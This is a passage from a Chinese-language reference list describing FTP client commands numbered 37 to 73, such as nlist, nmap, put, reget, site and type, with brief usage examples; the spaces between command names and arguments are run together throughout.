37.newerfile-name:如果遠程機中file-name的修改時間比本地硬盤同名文件的時間更近,則重傳該文件。
38.nlist[remote-dir][local-file]:顯示遠程主機目錄的文件清單,并存入本地硬盤的local-file。
39.nmap[inpatternoutpattern]:設置文件名映射機制,使得文件傳輸時,文件中的某些字符相互轉換,如:nmap$1.$2.$3[$1,$2].[$2,$3],則傳輸文件a1.a2.a3時,文件名變為a1,a2。該命令特别适用于遠程主機為非UNIX機的情況。
40.ntrans[inchars[outchars]]:設置文件名字符的翻譯機制,如ntrans1R,則文件名LLL将變為RRR。
41.openhost[port]:建立指定ftp服務器連接,可指定連接端口。
42.passive:進入被動傳輸方式。
43.prompt:設置多個文件傳輸時的交互提示。
44.proxyftp-cmd:在次要控制連接中,執行一條ftp命令,該命令允許連接兩個ftp服務器,以在兩個服務器間傳輸文件。第一條ftp命令必須為open,以首先建立兩個服務器間的連接。
45.putlocal-file[remote-file]:将本地文件local-file傳送至遠程主機。
46.pwd:顯示遠程主機的當前工作目錄。
47.quit:同bye,退出ftp會話。
48.quotearg1,arg2...:将參數逐字發至遠程ftp服務器,如:quotesyst.
49.recvremote-file[local-file]:同get。
50.regetremote-file[local-file]:類似于get,但若local-file存在,則從上次傳輸中斷處續傳。
51.rhelp[cmd-name]:請求獲得遠程主機的幫助。
52.rstatus[file-name]:若未指定文件名,則顯示遠程主機的狀态,否則顯示文件狀态。
53.rename[from][to]:更改遠程主機文件名。
54.reset:清除回答隊列。
55.restartmarker:從指定的标志marker處,重新開始get或put,如:restart130。
56.rmdirdir-name:删除遠程主機目錄。
57.runique:設置文件名隻一性存儲,若文件存在,則在原文件後加後綴.1,.2等。
58.sendlocal-file[remote-file]:同put。
59.sendport:設置PORT命令的使用。
60.sitearg1,arg2...:将參數作為SITE命令逐字發送至遠程ftp主機。
61.sizefile-name:顯示遠程主機文件大小,如:siteidle7200。
62.status:顯示當前ftp狀态。
63.struct[struct-name]:将文件傳輸結構設置為struct-name,缺省時使用stream結構。
64.sunique:将遠程主機文件名存儲設置為隻一(與runique對應)。
65.system:顯示遠程主機的操作系統類型。
66.tenex:将文件傳輸類型設置為TENEX機的所需的類型。
67.tick:設置傳輸時的字節計數器。
68.trace:設置包跟蹤。
69.type[type-name]:設置文件傳輸類型為type-name,缺省為ascii,如:typebinary,設置二進制傳輸方式。
70.umask[newmask]:将遠程服務器的缺省umask設置為newmask,如:umask3
71.useruser-name[password][account]:向遠程主機表明自己的身份,需要口令時,必須輸入口令,如:useranonymousmy@email。
72.verbose:同命令行的-v參數,即設置詳盡報告方式,ftp服務器的所有響應都将顯示給用戶,缺省為on。
73.[cmd]:同help.
